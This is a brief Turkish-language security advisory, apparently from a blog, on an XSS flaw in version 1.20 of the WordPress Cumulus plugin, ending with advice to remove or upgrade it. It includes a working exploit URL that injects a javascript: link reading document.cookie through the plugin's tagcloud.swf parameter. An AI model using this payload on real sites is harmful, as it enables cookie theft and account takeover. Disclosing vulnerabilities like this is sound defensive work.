

Wordpress Cumulus Eklentisi XSS Güvenlik Açığı
-
Risk: Normal
Etki: Cross-Site-Scripting (XSS) Saldırına mahruz kalmak
Etkilenenler: Cumulus 1.20 sürümlü eklentiyi kullanan WordPress Bloglar
Remote Exploit: Aktif -Mevcut
Bilgi: WordPress’in Cumulus eklentisinin 1.20 sürümünde keşfedilen Güvenlik açığı eklentinin kurulu olduğu WordPress bloglarda Cross-Site-Scripting (XSS) Saldırıları yapılmasına neden oluyor.
Exploit: http://hedefsite/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagclou
d=%3Ctags%3E%3Ca+href=’javascript:alert(document.cookie)’+style=’font-si
ze:+40pt’%3EClick%20me%3C/a%3E%3C/tags%3E
Eklentinin Orjinal Dizini: http://hedefsite/wp-content/plugins/wp-cumulus/wp-cumulus.phpNasıl Korunabiliriz, Güvenlik Önlemi Nedir ?
İlgili eklentiyi Bloğunuzda varsa kaldırabilir ya-da Cumulus eklentisinin bir üst sürümüne geçebilirsiniz.
Ref & Kaynak: http://www.onuroktay.com/?p=570